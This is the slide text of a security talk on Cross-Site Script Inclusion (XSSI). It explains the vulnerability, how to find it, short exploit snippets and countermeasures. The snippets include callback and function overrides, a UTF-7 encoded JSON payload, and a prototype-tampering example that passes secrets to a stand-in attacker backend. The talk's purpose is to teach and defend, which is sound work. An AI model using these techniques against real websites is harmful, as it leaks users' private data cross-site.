The Tale of a Fameless but Widespread Vulnerability

Slide 1

Slide 1 text

Once upon a time…

Slide 2

Slide 2 text

… but all was not good Same Origin Policy

Slide 3

Slide 3 text

BUT Scripts (and JSONP) don‘t fall under the same strict SOP and can be included cross-domain, which is why we have

Slide 4

Slide 4 text

XSSI - The Tale of a Fameless but Widespread Vulnerability Veit Hailperin @fenceposterror

Slide 5

Slide 5 text

Wait what? RESEARCH CONSULTING AUDITING

Slide 6

Slide 6 text

NOOO! XSSHowmany? www.malicious.net include script from www.your- bank.com leak data

Slide 7

Slide 7 text

What About Ambient Authority? ▸ Works just the same as with CSRF  ▸ Ambient Authority Information is sent cross-site ▸ Leaked Information get‘s more interesting…

Slide 8

Slide 8 text

Example Example

Slide 9

Slide 9 text

The Script

Slide 10

Slide 10 text

The Code

Slide 11

Slide 11 text

The Leak

Slide 12

Slide 12 text

You Said Fameless?

Slide 13

Slide 13 text

We observe that a third of the surveyed sites utilize dynamic JavaScript. […] more than 80% of the sites are susceptible to attacks via remote script inclusion. - The Unexpected Dangers of Dynamic JavaScript, S. Lekies et al. “

Slide 14

Slide 14 text

1. Categorizing XSSI XXX

Slide 15

Slide 15 text

Categorizing XSSI Dynamic JavaScript Non-Script Static JavaScript requiring Authentication Static Script / JSONP* * If the JSONP requires parameters, these need to be guessable 1 4 2 3

Slide 16

Slide 16 text

2. Finding XSSI

Slide 17

Slide 17 text

▸ Read the Code ▸ Grep for ▹ Public Keys ▹ Social Security Numbers ▹ Credit Card Numbers Finding XSSI Category 1

Slide 18

Slide 18 text

Finding XSSI Category 2 and 3 Re-Request the JavaScript file without authentication and check if response is script Does the answer differ from the original? Re-Request the JavaScript file check if answer differs again Script requires authentication No Yes No Script not dynamic Yes Yes No Script probably generally dynamic Dynamic JS based on authentication

Slide 19

Slide 19 text

Finding XSSI Category 4 – Non-Script / Browser Issues These issues are related to browser security Server Response [{'friend':'luke','email': '+ACcAfQBdADsAYQBsAGUAcgB0 ACgAJw BNAGEAeQAgAHQAaABlACAAZgBv AHIAYwBlACAAYgBlACAAdw BpAHQAaAAgAHkAbwB1ACcAKQA7 AFsAewAnAGoAb wBiACcAOgAnAGQAbwBuAGU-'}] Which translates to [{'friend':'luke','email': ''}];alert(‘May the force be with you’);[{'job':'done'}] Malicious Website http://www.thespanner.co.uk/2011/05/30/json-hijacking/

Slide 20

Slide 20 text

2. Exploiting XSSI

Slide 21

Slide 21 text

var privateKey = "-----BEGIN RSA PRIVATE KEY-----\ MIIEowIBAAKCAQEAvq7kdxjZq4naHB8jNTMrFsi SKhmf8rpsRWO0iS5EK/c+evvT\ [redacted] 9abcosxptnnP286cyq7whYysfe5HqODAwZJp5SG FPKqilWE1MBur\ -----END RSA PRIVATE KEY-----", keys = [ { name: 'Key No 1', apiKey: '0c8aab23-2ab5-46c5-a0f2-e52ecf7d6ea8', privateKey: privateKey }, { name: 'Key No 2', apiKey: '1e4b8312-f767-43eb-a16b-d44d3e471198', privateKey: privateKey } ]; Global Variables alert(JSON.stringify(keys[0])); some.js Case: Global Variable

Slide 22

Slide 22 text

Response angular.callbacks.7({"status":STATUS,"body":{"demographic s":{"email":......}}}) var angular = function () { return 1; }; angular.callbacks = function () { return 1; }; angular.callbacks.7 = function (leaked) { alert(JSON.stringify(leaked)); }; Case: Function Override

Slide 23

Slide 23 text

Response angular.callbacks._7({"status":STATUS,"body":{"demographics": {"email":......}}}) gimmethatdata = function (leaked) { alert(JSON.stringify(leaked)); }; Case: Provide Callback

Slide 24

Slide 24 text

(function(){ var arr = ["secret1", "secret2", "secret3"]; // intents to slice out first entry var x = arr.slice(1); ... })(); Array.prototype.slice = function(){ // leaks ["secret1", "secret2", "secret3"] sendToAttackerBackend(this); }; Case: Prototype Tampering Note: Example taken from S. Lekies paper

Slide 25

Slide 25 text

3. Preventing XSSI

Slide 26

Slide 26 text

Preventing XSSI ▸ No sensitive data in JavaScript files or JSONP cbs. ▸ Correct Content-Type ▸ X-Content-Type-Options: nosniff ▸ Anti-Cross-Site Request Forgery Token ▸ SameSite Cookie Attribute (draft!) ▸ Spread the word ▸ Report them

Slide 27

Slide 27 text

Links, References, Interesting Reads… • http://jeremiahgrossman.blogspot.ch/2006/01/advanced-web-attack- techniques-using.html • http://incompleteness.me/blog/2007/03/05/json-is-not-as-safe-as- people-think-it-is/ • http://www.thespanner.co.uk/2011/05/30/json-hijacking/ • http://phrack.org/issues/69/12.html • https://www.mbsd.jp/Whitepaper/xssi.pdf • https://www.usenix.org/system/files/conference/usenixsecurity15/sec15- paper-lekies.pdf • http://sebastian-lekies.de/leak/ • http://miladbr.blogspot.ch/2013/03/cross-site-script-inclusion.html • http://www.scip.ch/en/?labs.20160414

Slide 28

Slide 28 text

▸ Passive Scanner Module ▸ Filters for JSONP and Scripts ▸ It’s in your Burp Store ▸ Currently only implemented for cookie Released DetectDynamicJS Burp Extension to make your life easier in finding XSSI

Slide 29

Slide 29 text

Thanks for listening! Questions? @fenceposterror [email protected]